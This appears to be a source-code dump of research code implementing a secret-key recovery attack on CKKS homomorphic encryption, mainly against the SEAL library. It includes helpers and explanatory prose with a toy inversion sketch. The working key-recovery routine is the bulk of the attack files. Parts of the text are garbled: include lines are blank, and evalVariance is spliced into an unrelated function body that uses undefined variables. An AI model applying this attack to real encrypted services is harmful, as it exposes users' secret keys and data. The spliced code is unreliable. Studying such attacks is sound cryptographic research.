    uint64_t encoding_error = maxDiff(ptxt_res_coeff, ptxt_enc_coeff, context.N, context.qVec[0]);
    std::cout << "encoding error = " << encoding_error << std::endl;

    // rhs = m' - b
    uint64_t* rRhs = new uint64_t[ctxt_res.l << context.logN]();
    context.sub(rRhs, ptxt_enc.mx, ctxt_res.bx, ctxt_res.l); // What about using ptxt_res.mx ?

    // a^{-1}
    uint64_t* raInv = new uint64_t[ctxt_res.l << context.logN]();
    #pragma omp parallel for
    for (int i = 0; i < ctxt_res.l; i++) {
        uint64_t qi = context.qVec[i];
        for (int j = 0; j < context.N; j++) {
            raInv[j + i*context.N] = invMod(ctxt_res.ax[j + i*context.N], qi);
        }
    }

    // guess sk
    uint64_t* rss = new uint64_t[ctxt_res.l << context.logN]();
    context.mul(rss, raInv, rRhs, ctxt_res.l, 0);

    // for debugging, convert to coeff representation
    uint64_t* ss_coeff = new uint64_t[ctxt_res.l << context.logN]();
    uint64_t* sk_coeff = new uint64_t[ctxt_res.l << context.logN]();
    copy(rss, rss + context.N * ctxt_res.l, ss_coeff);
    copy(secretKey.sx, secretKey.sx + context.N * ctxt_res.l, sk_coeff);
    context.INTTAndEqual(ss_coeff, ctxt_res.l, 0);
    context.INTTAndEqual(sk_coeff, ctxt_res.l, 0);

    return !memcmp(rss, secretKey.sx, sizeof(uint64_t) * ctxt_res.l * context.N);
}

int main(int argc, char* argv[]) {
    // Parameters //
    HomomorphicComputation hc = argc>1 ? parseHC(argv[1]) : HC_NOOP; // Default noop
    long logN = argc>2 ? atoi(argv[2]) : 15; // Ring dimension
    long L = argc>3 ? atoi(argv[3]) : 10; // Total level of computation
    long logp = argc>4 ? atoi(argv[4]) : 20; // 20 bit precision
    double plainBound = argc>5 ? atof(argv[5]) : 1.0; // plaintext size
    long evalDeg = argc>6 ? atol(argv[6]) : 5; // max degree to evaluate

    std::cout << "Running attack on " << hcString(hc) << std::endl
              << " N = " << (1 << logN) << ", L = " << L << ", logp = " << logp << ", |plaintext| = " << plainBound << std::endl;

    srand(time(NULL));
    if (attack(hc, logN, L, logp, plainBound, evalDeg)) {
        cout << "Found key!" << endl;
    }
    else cout << "Attack failed!" << endl;

    return 0;
}

--------------------------------------------------------------------------------
/src/seal_attack.cpp:
--------------------------------------------------------------------------------
// Key recovery attack against the SEAL implementation of CKKS
#include "seal/seal.h"
#include "seal/util/polyarithsmallmod.h"

#include
#include
#include

#include "seal_utils.h"
#include "eval.h"

using namespace seal;


void evalVariance(Ciphertext & ctRes, Ciphertext const& ct, CKKSEncoder & encoder,
        Evaluator & evaluator, RelinKeys const& relin_keys, GaloisKeys const& gal_keys,
        uint32_t logBatchSize, double scale) {
    std::cout << "evalVariance size = " << (1< ctPow2s(logDeg+1);
    evalPowerOf2(ctPow2s, ct, logDeg, evaluator, relin_keys);
    ctRes = ct;

    std::vector<Plaintext> plain_coeff(deg+1);
    encoder.encode(coeff[1], ct.parms_id(), scale, plain_coeff[1]);
    evaluator.multiply_plain_inplace(ctRes, plain_coeff[1]); // c_1 * x
    evaluator.rescale_to_next_inplace(ctRes);

    encoder.encode(coeff[0], ctRes.parms_id(), ctRes.scale(), plain_coeff[0]); // same scale as ctRes
    evaluator.add_plain_inplace(ctRes, plain_coeff[0]); // c_1 * x + c_0
    for (int i = 2; i <= deg; i++) {
        if (fabs(coeff[i]) < 1e-27) {
            continue; // Too small, skip this term
        }
        int k = std::floor(std::log2((double)i));
        int r = i - (1 << k); // i = 2^k + r
        Ciphertext tmp = ctPow2s[k]; // x^(2^k)
        while (r > 0) {
            k = std::floor(std::log2((double)r));
            r = r - (1 << k);

            Ciphertext ctPow2k = ctPow2s[k];
            evaluator.mod_switch_to_inplace(ctPow2k, tmp.parms_id()); // ctPow2s[k] is in a higher level
            evaluator.multiply_inplace(tmp, ctPow2k);
            evaluator.relinearize_inplace(tmp, relin_keys);
            evaluator.rescale_to_next_inplace(tmp);
        }

        encoder.encode(coeff[i], tmp.parms_id(), tmp.scale(), plain_coeff[i]); // same scale as tmp
        evaluator.multiply_plain_inplace(tmp, plain_coeff[i]); // c_i * x^i
        evaluator.rescale_to_next_inplace(tmp);

        auto res_context_data = context->get_context_data(ctRes.parms_id());
        auto tmp_context_data = context->get_context_data(tmp.parms_id());
        if (res_context_data->chain_index() < tmp_context_data->chain_index()) {
            evaluator.mod_switch_to_inplace(tmp, ctRes.parms_id());
        } else {
            evaluator.mod_switch_to_inplace(ctRes, tmp.parms_id());
        }
        double new_scale = pow(2.0, round(log2(tmp.scale())));
        tmp.scale() = new_scale; // round the scaling factor to the nearest power of 2
        ctRes.scale() = new_scale; // round the scaling factor to the nearest power of 2
        evaluator.add_inplace(ctRes, tmp); // Now they can be added together
    }
}



int attack(uint32_t logN = 15, // Ring size
           uint32_t scaleBits = 40, // bit-length of the scaling factor
           double plainBound = 1.0, // bound on the plaintext numbers
           int32_t evalDeg = -1, // degree to evaluate, default to all
           HomomorphicComputation hc = HC_NOOP // the circuit to compute homomorphically
           ) {
    EncryptionParameters parms(scheme_type::CKKS); // Set the parameters for CKKS
    size_t poly_modulus_degree = 1<<logN;
    parms.set_poly_modulus_degree(poly_modulus_degree);

    int maxQBits = logN == 16 ? 350 : CoeffModulus::MaxBitCount(poly_modulus_degree, sec_level_type::tc256);
    std::vector<int> modulusBits = { 60 }; // Set the first prime to be 60-bit
    int totalQBits = 60;
    while (totalQBits <= maxQBits-60) { // reserve the last special prime (60-bit)
        modulusBits.push_back(scaleBits); // add a prime modulus of size == scaleBits
        totalQBits += scaleBits;
    }
    modulusBits.push_back(60); // add the special prime modulus
    parms.set_coeff_modulus(CoeffModulus::Create(
        poly_modulus_degree, modulusBits));
    auto context = SEALContext::Create(parms, true, sec_level_type::none);
    print_parameters(context);

    // Generate keys
    KeyGenerator keygen(context);
    PublicKey public_key = keygen.public_key();
    SecretKey secret_key = keygen.secret_key();
    RelinKeys relin_keys = keygen.relin_keys_local();
    GaloisKeys gal_keys;

    if (hc == HC_VARIANCE) {
        // Generate rotation keys for variance computation
        std::vector<int> rotIndexSet(logN-1);
        for (int32_t i = 0; i < logN-1; i++) {
            rotIndexSet[i] = -(1 << i);
        }
        gal_keys = keygen.galois_keys_local(rotIndexSet);
    }

    Encryptor encryptor(context, public_key);
    Evaluator evaluator(context);
    Decryptor decryptor(context, secret_key);
    CKKSEncoder encoder(context);
    size_t slot_count = encoder.slot_count(); // Let's use all the available slots

    // First we generate some random numbers
    std::vector<cx_double> val_input(slot_count);
    randomComplexVector(val_input, slot_count, plainBound);

    // Set the initial scale
    double scale = pow(2.0, scaleBits);

    // Encode plaintext numbers into a polynomial
    Plaintext ptxt_input;
    encoder.encode(val_input, scale, ptxt_input);
    Ciphertext ctxt_input;
    encryptor.encrypt(ptxt_input, ctxt_input);

    // Homomorphic computation
    Ciphertext ctxt_res;
    std::vector<double> coeff(11);
    switch (hc) {
        case HC_VARIANCE :
            evalVariance(ctxt_res, ctxt_input, encoder, evaluator, relin_keys, gal_keys, log2(slot_count), scale);
            break;
        case HC_SIGMOID :
            coeff = SpecialFunction::coeffsOf[SpecialFunction::FuncName::SIGMOID];
            evalFunction(ctxt_res, ctxt_input, coeff, context, encoder, evaluator, relin_keys, scale, evalDeg);
            break;
        case HC_EXP :
            coeff = SpecialFunction::coeffsOf[SpecialFunction::FuncName::EXP];
            evalFunction(ctxt_res, ctxt_input, coeff, context, encoder, evaluator, relin_keys, scale, evalDeg);
            break;
        default :
            ctxt_res = ctxt_input; // noop, just copy the input ciphertext
    }
    // Now let's do approximate decryption and then recover the key
    Plaintext ptxt_res;
    decryptor.decrypt(ctxt_res, ptxt_res); // approx decryption

    // Decode the plaintext polynomial
    std::vector<std::complex<double>> val_res;
    encoder.decode(ptxt_res, val_res); // decode to an array of complex

    // Check computation errors
    std::vector<std::complex<double>> pt_res(slot_count);
    switch (hc) {
        case HC_VARIANCE :
            evalPlainVariance(pt_res, val_input);
            break;
        case HC_SIGMOID :
            evalPlainFunc(pt_res, val_input, SpecialFunction::SIGMOID, evalDeg);
            break;
        case HC_EXP :
            evalPlainFunc(pt_res, val_input, SpecialFunction::EXP, evalDeg);
            break;
        default :
            pt_res = val_input; // noop, just copy the plaintext input
    }
    std::cout << "computation error = " << maxDiff(pt_res, val_res)
              << ", relative error = " << relError(pt_res, val_res) << std::endl;

    // **************************************************
    // Key recovery attack
    // **************************************************

    // First we encode the decrypted floating point numbers into polynomials
    Plaintext ptxt_enc;
    encoder.encode(val_res, ctxt_res.parms_id(), ctxt_res.scale(), ptxt_enc);

    // Then fetch the implementation parameters at the ciphertext's level (NTT tables, RNS moduli)
    auto context_data = context->get_context_data(ctxt_res.parms_id());
    auto small_ntt_tables = context_data->small_ntt_tables();
    auto &ciphertext_parms = context_data->parms();
    auto &coeff_modulus = ciphertext_parms.coeff_modulus();
    size_t coeff_mod_count = coeff_modulus.size();
    size_t coeff_count = ciphertext_parms.poly_modulus_degree();

    // Check encoding error
    Plaintext ptxt_diff;
    // SEAL does not allow resizing a plaintext in NTT form (nonzero parms_id), so clear it first
    ptxt_diff.parms_id() = parms_id_zero;
    ptxt_diff.resize(util::mul_safe(coeff_count, coeff_modulus.size()));
    sub_dcrtpoly(ptxt_enc.data(), ptxt_res.data(), coeff_count, coeff_modulus, ptxt_diff.data());

    to_coeff_rep(ptxt_diff.data(), coeff_count, coeff_mod_count, small_ntt_tables);
    long double err_norm = infty_norm(ptxt_diff.data(), context_data.get());
    std::cout << "encoding error = " << err_norm << std::endl;

    // Now let's compute the secret key
    MemoryPoolHandle pool = MemoryManager::GetPool();
    std::cout << "key recovery ..." << std::endl;

    // rhs = ptxt_enc - ciphertext.b, where ciphertext = (b, a) = (ctxt_res.data(0), ctxt_res.data(1))
    auto rhs(util::allocate_zero_poly(poly_modulus_degree, coeff_mod_count, pool));
    sub_dcrtpoly(ptxt_enc.data(), ctxt_res.data(0), coeff_count, coeff_modulus, rhs.get());

    // ca = ciphertext.a
    auto ca(util::allocate_zero_poly(poly_modulus_degree, coeff_mod_count, pool));
    assign_dcrtpoly(ctxt_res.data(1), coeff_count, coeff_modulus.size(), ca.get());

    std::cout << "compute ca^{-1} ..."
              << std::endl;
    auto ca_inv(util::allocate_zero_poly(poly_modulus_degree, coeff_mod_count, pool));

    bool has_inv = inv_dcrtpoly(ca.get(), coeff_count, coeff_modulus, ca_inv.get());
    if (!has_inv) {
        throw std::logic_error("ciphertext[1] has no inverse");
    }

    // The recovered secret: key_guess = ciphertext.a^{-1} * rhs
    std::cout << "compute (m' - cb) * ca^{-1} ..." << std::endl;
    auto key_guess(util::allocate_zero_poly(poly_modulus_degree, coeff_mod_count, pool));
    mul_dcrtpoly(rhs.get(), ca_inv.get(), coeff_count, coeff_modulus, key_guess.get());

    // The secret key is stored at the key level, whose RNS primes begin with the
    // ciphertext's primes, so comparing the first coeff_count * coeff_mod_count words suffices
    bool is_found = util::is_equal_uint(key_guess.get(),
                                        secret_key.data().data(),
                                        coeff_count * coeff_mod_count);

    // In retrospect, let's see how big the re-encoded polynomial is
    to_coeff_rep(ptxt_enc.data(), coeff_count, coeff_mod_count, small_ntt_tables);
    std::cout << "m' norm bits = " << log2(l2_norm(ptxt_enc.data(), context_data.get())) << std::endl;

    return is_found; // All done
}

// usage: seal_attack [iter] [hc] [logN] [scaleBits] [plainBound] [evalDeg]
int main(int argc, char * argv[]) {
    int iter = 1;
    if (argc >= 2) { // read the iteration count whenever it is given, not only when it is the sole argument
        iter = atoi(argv[1]);
    }
    HomomorphicComputation hc = argc>2 ? parseHC(argv[2]) : HC_NOOP;
    uint32_t logN = argc > 3 ? atoi(argv[3]) : 15; // ring size
    uint32_t scaleBits = argc > 4 ? atoi(argv[4]) : 40; // bit-length of scale
    double plainBound = argc > 5 ? atof(argv[5]) : 1.0; // upper bound on plaintext numbers
    int32_t evalDeg = argc > 6 ? atoi(argv[6]) : -1; // degree to evaluate, default to all

    int success = 0;
    for (int i = 0; i<iter; i++) {
        if (attack(logN, scaleBits, plainBound, evalDeg, hc)) {
            std::cout << "Found key!" << std::endl;
            success++;
        }
        else std::cout << "Attack failed!"
                       << std::endl;
    }
    std::cout << "Attack worked " << success << " times out of " << iter << std::endl;
    return 0;
}

--------------------------------------------------------------------------------
/src/seal_utils.cpp:
--------------------------------------------------------------------------------
#include "seal_utils.h"
#include <seal/util/uintarithsmallmod.h>
#include <seal/util/polyarithsmallmod.h>

#include <algorithm>  // std::fill_n
#include <cmath>      // powl, fabsl, sqrtl
#include <iostream>
#include <sstream>    // std::ostringstream

void print_parameters(std::shared_ptr<seal::SEALContext> context) {
    auto &context_data = *context->key_context_data();
    std::cout << "Encryption parameters :" << std::endl;
    std::cout << " poly_modulus_degree: " <<
        context_data.parms().poly_modulus_degree() << std::endl;
    // Print the size of the true (product) coefficient modulus.
    std::cout << " coeff_modulus size: ";

    std::cout << context_data.total_coeff_modulus_bit_count() << " (";
    auto coeff_modulus = context_data.parms().coeff_modulus();
    std::size_t coeff_mod_count = coeff_modulus.size();
    for (std::size_t i = 0; i < coeff_mod_count - 1; i++)
    {
        std::cout << coeff_modulus[i].bit_count() << " + ";
    }

    std::cout << coeff_modulus.back().bit_count();
    std::cout << ") bits" << std::endl;
}

bool inv_dcrtpoly(util::ConstCoeffIter operand, std::size_t coeff_count, std::vector<Modulus> const& coeff_modulus,
                  util::CoeffIter result) {
    // One flag per RNS prime; each OpenMP thread writes only its own entry
    bool * has_inv = new bool[coeff_modulus.size()];
    std::fill_n(has_inv, coeff_modulus.size(), true);
#pragma omp parallel for
    for (size_t j = 0; j < coeff_modulus.size(); j++) {
        for (size_t i = 0; i < coeff_count && has_inv[j]; i++) {
            uint64_t inv = 0;
            if (util::try_invert_uint_mod(operand[i + (j * coeff_count)], coeff_modulus[j], inv)) {
                result[i + (j * coeff_count)] = inv;
            } else {
                has_inv[j] = false;
            }
        }
    }
    for (size_t j = 0; j < coeff_modulus.size();
         j++) {
        if (!has_inv[j]) {
            delete [] has_inv; // free the flags on the failure path too
            return false;
        }
    }
    delete [] has_inv;
    return true;
}

void mul_dcrtpoly(util::ConstCoeffIter a, util::ConstCoeffIter b, std::size_t coeff_count,
                  std::vector<Modulus> const& coeff_modulus, util::CoeffIter result) {
#pragma omp parallel for
    for (size_t j = 0; j < coeff_modulus.size(); j++) {
        util::dyadic_product_coeffmod(a + (j * coeff_count),
                                      b + (j * coeff_count),
                                      coeff_count,
                                      coeff_modulus[j],
                                      result + (j * coeff_count));
    }
}

void add_dcrtpoly(util::ConstCoeffIter a, util::ConstCoeffIter b, std::size_t coeff_count,
                  std::vector<Modulus> const& coeff_modulus, util::CoeffIter result) {
#pragma omp parallel for
    for (size_t j = 0; j < coeff_modulus.size(); j++) {
        util::add_poly_coeffmod(a + (j * coeff_count),
                                b + (j * coeff_count),
                                coeff_count,
                                coeff_modulus[j],
                                result + (j * coeff_count));
    }
}

void sub_dcrtpoly(util::ConstCoeffIter a, util::ConstCoeffIter b, std::size_t coeff_count,
                  std::vector<Modulus> const& coeff_modulus, util::CoeffIter result) {
#pragma omp parallel for
    for (size_t j = 0; j < coeff_modulus.size(); j++) {
        util::sub_poly_coeffmod(a + (j * coeff_count),
                                b + (j * coeff_count),
                                coeff_count,
                                coeff_modulus[j],
                                result + (j * coeff_count));
    }
}

void assign_dcrtpoly(util::ConstCoeffIter a, std::size_t coeff_count, std::size_t coeff_modulus_count,
                     util::CoeffIter result) {
#pragma omp parallel for
    for (size_t i = 0; i < coeff_modulus_count; i++) {
        util::set_poly(a + (i * coeff_count), coeff_count, 1, result + (i * coeff_count));
    }
}

void to_eval_rep(util::CoeffIter a, size_t coeff_count, size_t coeff_modulus_count, util::NTTTables const* small_ntt_tables) {
#pragma omp parallel for
    for (size_t j = 0; j < coeff_modulus_count; j++) {
        util::ntt_negacyclic_harvey(a + (j *
                                    coeff_count), small_ntt_tables[j]); // ntt form
    }
}

void to_coeff_rep(util::CoeffIter a, size_t coeff_count, size_t coeff_modulus_count, util::NTTTables const* small_ntt_tables) {
#pragma omp parallel for
    for (size_t j = 0; j < coeff_modulus_count; j++) {
        util::inverse_ntt_negacyclic_harvey(a + (j * coeff_count), small_ntt_tables[j]); // non-ntt form
    }
}

long double infty_norm(util::ConstCoeffIter a, SEALContext::ContextData const* context_data) {
    auto &ciphertext_parms = context_data->parms();
    auto &coeff_modulus = ciphertext_parms.coeff_modulus();
    size_t coeff_mod_count = coeff_modulus.size();
    size_t coeff_count = ciphertext_parms.poly_modulus_degree();
    auto decryption_modulus = context_data->total_coeff_modulus();
    auto upper_half_threshold = context_data->upper_half_threshold();

    long double max = 0;

    auto aCopy(util::allocate_zero_poly(coeff_count, coeff_mod_count, MemoryManager::GetPool()));
    assign_dcrtpoly(a, coeff_count, coeff_mod_count, aCopy.get());

    // CRT-compose the polynomial: afterwards coefficient i is a multi-word integer modulo
    // q = p0 * p1 * ..., stored in the coeff_mod_count 64-bit words starting at
    // aCopy[i * coeff_mod_count] (least significant word first)
    context_data->rns_tool()->base_q()->compose_array(aCopy.get(), coeff_count, MemoryManager::GetPool());

    long double two_pow_64 = powl(2.0, 64);

    for (std::size_t i = 0; i < coeff_count; i++) {
        long double coeff = 0.0, cur_pow = 1.0;
        if (util::is_greater_than_or_equal_uint(aCopy.get() + (i * coeff_mod_count),
                                                upper_half_threshold, coeff_mod_count)) {
            // Upper half: the coefficient represents the negative value a - q,
            // accumulated word by word as sum_j (a_j - q_j) * 2^(64 j)
            for (std::size_t j = 0; j < coeff_mod_count; j++, cur_pow *= two_pow_64) {
                if (aCopy[i * coeff_mod_count + j] > decryption_modulus[j]) {
                    auto diff = aCopy[i * coeff_mod_count + j] - decryption_modulus[j];
                    coeff += diff ? static_cast<long double>(diff) * cur_pow : 0.0;
                } else {
                    auto diff = decryption_modulus[j] - aCopy[i * coeff_mod_count + j];
                    coeff -= diff ?
                             static_cast<long double>(diff) * cur_pow : 0.0;
                }
            }
        } else {
            // Lower half: the coefficient is the non-negative value a itself
            for (std::size_t j = 0; j < coeff_mod_count; j++, cur_pow *= two_pow_64) {
                auto curr_coeff = aCopy[i * coeff_mod_count + j];
                coeff += curr_coeff ? static_cast<long double>(curr_coeff) * cur_pow : 0.0;
            }
        }

        if (fabsl(coeff) > max) {
            max = fabsl(coeff);
        }
    }

    return max;
}

long double l2_norm(util::ConstCoeffIter a, SEALContext::ContextData const* context_data) {
    auto &ciphertext_parms = context_data->parms();
    auto &coeff_modulus = ciphertext_parms.coeff_modulus();
    size_t coeff_mod_count = coeff_modulus.size();
    size_t coeff_count = ciphertext_parms.poly_modulus_degree();
    auto decryption_modulus = context_data->total_coeff_modulus();
    auto upper_half_threshold = context_data->upper_half_threshold();

    long double sum = 0;

    auto aCopy(util::allocate_zero_poly(coeff_count, coeff_mod_count, MemoryManager::GetPool()));
    assign_dcrtpoly(a, coeff_count, coeff_mod_count, aCopy.get());

    // CRT-compose the polynomial (same multi-word layout as in infty_norm)
    context_data->rns_tool()->base_q()->compose_array(aCopy.get(), coeff_count, MemoryManager::GetPool());

    long double two_pow_64 = powl(2.0, 64);

    for (std::size_t i = 0; i < coeff_count; i++) {
        long double coeff = 0.0, cur_pow = 1.0;
        if (util::is_greater_than_or_equal_uint(aCopy.get() + (i * coeff_mod_count),
                                                upper_half_threshold, coeff_mod_count)) {
            // Upper half: accumulate the negative value a - q word by word
            for (std::size_t j = 0; j < coeff_mod_count; j++, cur_pow *= two_pow_64) {
                if (aCopy[i * coeff_mod_count + j] > decryption_modulus[j]) {
                    auto diff = aCopy[i * coeff_mod_count + j] - decryption_modulus[j];
                    coeff += diff ? static_cast<long double>(diff) * cur_pow : 0.0;
                } else {
                    auto diff = decryption_modulus[j] - aCopy[i * coeff_mod_count + j];
                    coeff -= diff ?
                             static_cast<long double>(diff) * cur_pow : 0.0;
                }
            }
        } else {
            for (std::size_t j = 0; j < coeff_mod_count; j++, cur_pow *= two_pow_64) {
                auto curr_coeff = aCopy[i * coeff_mod_count + j];
                coeff += curr_coeff ? static_cast<long double>(curr_coeff) * cur_pow : 0.0;
            }
        }

        sum += coeff * coeff;
    }

    return sqrtl(sum);
}

std::string poly_to_string(std::uint64_t const* value, EncryptionParameters const& parms) {
    auto coeff_modulus = parms.coeff_modulus();
    size_t coeff_mod_count = coeff_modulus.size();
    size_t coeff_count = parms.poly_modulus_degree();
    std::ostringstream result;
    for (size_t i = 0; i < coeff_mod_count; i++) {
        auto mod = coeff_modulus[i].value();
        if (i>0) {
            result << std::endl;
        }
        result << "[" << mod << "]: ";
        for (size_t j = 0; j < coeff_count; j++) {
            std::uint64_t v = *value;
            if (v > mod/2) { // print the centered (possibly negative) representative
                result << "-" << mod-v;
            } else {
                result << v;
            }
            result << (j + 1 == coeff_count ? "" : ", "); // no separator after the last coefficient
            value++;
        }
    }
    return result.str();
}


void print_poly(std::uint64_t const* value, EncryptionParameters const& parms, size_t max_count) {
    auto coeff_modulus = parms.coeff_modulus();
    size_t coeff_mod_count = coeff_modulus.size();
    size_t coeff_count = parms.poly_modulus_degree();
    // Number of coefficients printed per RNS component (max_count == 0 means all)
    size_t print_count = (max_count == 0 || max_count > coeff_count) ? coeff_count : max_count;
    for (size_t i = 0; i < coeff_mod_count; i++) {
        auto mod = coeff_modulus[i].value();
        std::uint64_t const* v = value + i*coeff_count;
        if (i>0) {
            std::cout << std::endl;
        }
        std::cout << "[" << mod << "]: ";
        for (size_t j = 0; j < print_count; j++) {
            if (*v > mod/2) { // print the centered (possibly negative) representative
                std::cout << "-" << mod-(*v);
            } else {
                std::cout << *v;
            }
            std::cout << (j + 1 == print_count ? "" : ", "); // no separator after the last printed coefficient
            v++;
        }
    }
    std::cout.flush();
}
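The sign handling in `infty_norm`, `l2_norm`, `poly_to_string` and `print_poly` rests on the centered representative of a residue. Below is a minimal single-word sketch. It assumes an odd modulus q below 2^63. It also takes (q + 1) / 2 as the point at which a residue is read as negative, which is our reading of SEAL's `upper_half_threshold` and has not been verified against the library. `center_mod` is a hypothetical helper, not part of this repository or of SEAL.

```cpp
#include <cstdint>

// Hypothetical helper (not in this repository or in SEAL): map a residue
// v in [0, q) to its centered representative. For odd q the result lies in
// [-(q-1)/2, (q-1)/2]. Assumes v < q and q < 2^63 so the result fits in int64_t.
constexpr std::int64_t center_mod(std::uint64_t v, std::uint64_t q) {
    // Residues at or above (q + 1) / 2 stand for the negative value v - q;
    // for odd q this is the same test as v > q / 2.
    const std::uint64_t upper_half_threshold = (q + 1) / 2;
    if (v >= upper_half_threshold) {
        return -static_cast<std::int64_t>(q - v);
    }
    return static_cast<std::int64_t>(v);
}

// Usage: compile-time checks for q = 97 (threshold 49).
static_assert(center_mod(48, 97) == 48, "below the threshold: unchanged");
static_assert(center_mod(49, 97) == -48, "at the threshold: read as negative");
static_assert(center_mod(96, 97) == -1, "q - 1 maps to -1");
```

The norm functions apply the same rule, but to the CRT-composed coefficient modulo the full product q. That coefficient spans several 64-bit words, so they accumulate the signed value word by word in `long double` rather than using one integer subtraction.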
--------------------------------------------------------------------------------
/src/seal_utils.h:
--------------------------------------------------------------------------------
#ifndef SEAL_UTILS_H
#define SEAL_UTILS_H
// Some helper functions to use with SEAL

#include <algorithm> // std::copy
#include <iostream>
#include <iterator>  // std::ostream_iterator
#include <memory>    // std::shared_ptr
#include <string>
#include <vector>
#include <seal/seal.h>
#include <seal/modulus.h>
#include <seal/util/iterator.h>

using namespace seal;

void print_parameters(std::shared_ptr<seal::SEALContext> context);

// Compute a^{-1}, where a is a double-CRT polynomial given in evaluation (NTT)
// representation in aEvalRep. SEAL stores a double-CRT polynomial as a flat array
// of length coeff_count * modulus_count:
//   [ 0 .. coeff_count-1 , coeff_count .. 2*coeff_count-1 , ... ]
//     ^--- a (mod p0)    , ^--- a (mod p1)                , ...
// Returns true if the inverse exists, i.e. every evaluation slot is nonzero modulo
// its prime; the result is also in evaluation representation.
bool inv_dcrtpoly(util::ConstCoeffIter aEvalRep, std::size_t coeff_count, std::vector<Modulus> const& coeff_modulus,
                  util::CoeffIter result);

// Compute a*b, where both a and b are in evaluation representation
void mul_dcrtpoly(util::ConstCoeffIter a, util::ConstCoeffIter b,
                  std::size_t coeff_count, std::vector<Modulus> const& coeff_modulus,
                  util::CoeffIter result);

// Compute a+b, where both a and b are in the same representation
void add_dcrtpoly(util::ConstCoeffIter a, util::ConstCoeffIter b,
                  std::size_t coeff_count, std::vector<Modulus> const& coeff_modulus,
                  util::CoeffIter result);

// Compute a-b, where both a and b are in the same representation
void sub_dcrtpoly(util::ConstCoeffIter a, util::ConstCoeffIter b,
                  std::size_t coeff_count, std::vector<Modulus> const& coeff_modulus,
                  util::CoeffIter result);

// Assign result = a
void assign_dcrtpoly(util::ConstCoeffIter a, std::size_t coeff_count, std::size_t
                     coeff_modulus_count,
                     util::CoeffIter result);

// In-place conversion from coefficient to evaluation (NTT) representation, prime by prime
void to_eval_rep(util::CoeffIter a, size_t coeff_count, size_t coeff_modulus_count, util::NTTTables const* small_ntt_tables);

// In-place conversion from evaluation (NTT) back to coefficient representation
void to_coeff_rep(util::CoeffIter a, size_t coeff_count, size_t coeff_modulus_count, util::NTTTables const* small_ntt_tables);

// Infinity and Euclidean norms of a polynomial in coefficient representation, with each
// coefficient lifted to its centered representative modulo the product of the primes
long double infty_norm(util::ConstCoeffIter a, SEALContext::ContextData const* context_data);

long double l2_norm(util::ConstCoeffIter a, SEALContext::ContextData const* context_data);

// Format or print each RNS component as "[p]: c0, c1, ..." with centered coefficients;
// print_poly prints at most max_count coefficients per component (0 means all)
std::string poly_to_string(std::uint64_t const* value, EncryptionParameters const& parms);

void print_poly(std::uint64_t const* value, EncryptionParameters const& parms, size_t max_count=0);

template<typename T>
std::ostream &operator <<(std::ostream &os, const std::vector<T> &v) {
    using namespace std;
    os << "[";
    copy(v.begin(), v.end(), ostream_iterator<T>(os, ", "));
    os << "]";
    return os;
}

#endif // SEAL_UTILS_H

--------------------------------------------------------------------------------
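The core of `attack()` solves m = c0 + c1 * s for s. Polynomials are kept in evaluation (NTT) form, where multiplication is slot-wise, so `inv_dcrtpoly` and `mul_dcrtpoly` reduce to per-slot modular inversion and multiplication. The sketch below illustrates this on toy data under stated assumptions:

- a single prime p < 2^32;
- short vectors standing in for NTT slots (no actual NTT is computed);
- inversion via Fermat's little theorem instead of SEAL's `try_invert_uint_mod`.

`pow_mod` and `recover_secret` are hypothetical names, not part of this repository or of SEAL.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <stdexcept>
#include <vector>

using u64 = std::uint64_t;

// Hypothetical helper: a^e mod p by square-and-multiply.
u64 pow_mod(u64 a, u64 e, u64 p) {
    assert(p > 1 && p < (u64{1} << 32)); // keeps every product below 2^64
    u64 result = 1;
    a %= p;
    while (e > 0) {
        if (e & 1) result = result * a % p;
        a = a * a % p;
        e >>= 1;
    }
    return result;
}

// Hypothetical toy version of the key-recovery step for ONE prime p.
// m, c0 and c1 are equal-length vectors of evaluation slots, where polynomial
// multiplication is slot-wise, so s = (m - c0) * c1^{-1} slot by slot.
// m must be the exact decrypted plaintext, m = c0 + c1 * s (mod p).
std::vector<u64> recover_secret(const std::vector<u64>& m,
                                const std::vector<u64>& c0,
                                const std::vector<u64>& c1, u64 p) {
    std::vector<u64> s(m.size());
    for (std::size_t i = 0; i < m.size(); i++) {
        const u64 a = c1[i] % p;
        if (a == 0) {
            // A zero slot means c1 has no inverse (compare inv_dcrtpoly returning false)
            throw std::domain_error("c1 is not invertible modulo p");
        }
        const u64 a_inv = pow_mod(a, p - 2, p);         // Fermat: a^(p-2) = a^(-1) mod prime p
        const u64 rhs = (m[i] % p + p - c0[i] % p) % p; // m - c0 (mod p)
        s[i] = rhs * a_inv % p;
    }
    return s;
}
```

For example, take p = 97, s = (3, 96, 0, 1), c0 = (10, 20, 30, 40) and c1 = (5, 17, 42, 88). Forming m = c0 + c1 * s slot-wise and calling `recover_secret(m, c0, c1, 97)` gives back s. In the attack the same computation runs independently for every RNS prime. It recovers the key only when the re-encoded plaintext equals the decrypted polynomial exactly, which is the condition the printed encoding error monitors.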